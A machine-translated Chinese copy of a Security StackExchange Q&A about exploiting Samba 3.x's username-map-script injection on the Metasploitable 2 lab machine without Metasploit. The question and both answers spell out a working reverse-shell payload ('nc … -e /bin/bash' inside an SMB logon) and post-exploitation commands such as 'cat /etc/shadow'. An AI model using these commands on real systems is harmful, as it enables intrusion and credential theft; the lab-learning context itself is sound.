首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >没有Metasploit的反向连接Metasploitable 2 -> Kali Linux (Samba3.x)

没有Metasploit的反向连接Metasploitable 2 -> Kali Linux (Samba3.x)
EN

Security用户
提问于 2018-01-08 17:22:58
回答 2查看 9.6K关注 0票数 6

我试图在不使用Metasploit的情况下开发Metasploitable 2,目的是学习。在本例中,我将重点关注Samba 3.x (端口TCP 139,445)。

在这个链接中,http://www.rwbnetsec.com/samba-3-x/解释了在nmap扫描显示TCP端口139和445打开后利用这台机器的两种不同方法,它们运行着Samba 3.x。

第二种方法解释说

此漏洞利用Samba的“用户名映射脚本”功能。没有用户输入的过滤,因此攻击者可以连接到SMB会话,并使用shell元字符作为用户名的输入,从而在远程系统上执行命令。这可能使攻击者能够通过根访问获取到受攻击计算机的远程外壳。

当使用Metasploit时,我的问题就出现了,因为它用于:

  • http://www.reydes.com/d/?q=Explotar_Vulnerabilidad_用户名_地图_脚本_de_桑巴_圆锥体_无国界医生
  • http://resources.infosecinstitute.com/hacking-and-gaining-access-to-linux-by-exploiting-samba-service/

我终于找到了避免Metasploit的视频https://www.youtube.com/watch?v=-Y8-fZAvq9c,但它对我不起作用,下面是这样的(Kali=192.168.200.1;Metasploitable2=192.168.200.130):

  1. 在终端窗口1中,我们将netcat设置为侦听: netcat -nlvp 4444
  2. 在终端窗口2中,我们检查共享smbclient -L //192.168.200.130。
  3. 我们关注tmp文件夹,并连接(终端2):smbclient //192.168.200.130/tmp
  4. 最后,我们获得"smb:>“,其中命令" logon”用于反向连接到Kali,如smb:>logon "/=nc 192.168.200.1 4444 -e /bin/bash“。

最后一点不适用于以下错误消息“会话设置失败: NT_STATUS_NO_MEMORY”。

我很难找到一个很好的手册来解释“登录”命令。我试图改变netcat的使用方式:

在第1点,我写

代码语言:javascript
复制
smb: \> nc -nlvp 4444 -e /bin/bash

在第4点,我写

代码语言:javascript
复制
smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

同样的结果。同样的信息错误。

我真的想自己做,但做不到。如果你能帮我,我会非常感激的。

EN

回答 2

Security用户

回答已采纳

发布于 2018-08-12 21:08:19

看起来您正在smb (易受攻击框)中设置侦听器。

代码语言:javascript
复制
smb: \> nc -nlvp 4444 -e /bin/bash

你应该做的是在你的攻击盒中设置听者。相反,使用以下命令:

代码语言:javascript
复制
nc -nlvp 4444 

最后,从您的metasploitable2发出命令:

代码语言:javascript
复制
logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
票数 5
EN

Security用户

发布于 2018-08-14 13:12:34

对于那些和我有同样问题的人,我回答我是如何解决的,根据前面的答案,以及这个链接Metasploitable 2-Samba

应采取的步骤如下:

  1. 我们打开终端窗口1,并将netcat设置为侦听:netcat -nlvp 4444
  2. 我们打开终端窗口2,我们检查受害者的股份:smbclient -L //192.168.200.130
  3. (终端2)我们专注于tmp文件夹,并连接到受害者:smbclient //192.168.200.130/tmp
  4. (终端2)最后,我们获得了smb: >,其中命令logon用于反向连接到Kali,作为smb:> logon "/=nc 192.168.200.1 4444 -e /bin/bash

小心:别忘了背虱。

  1. (终端1)我们可以看到建立的连接,并可以插入我们想要的命令。示例:
    • id
    • hostname
    • uname -a
    • cat /etc/shadow

提示密码时,只需单击enter (保留为空)。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/177083

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档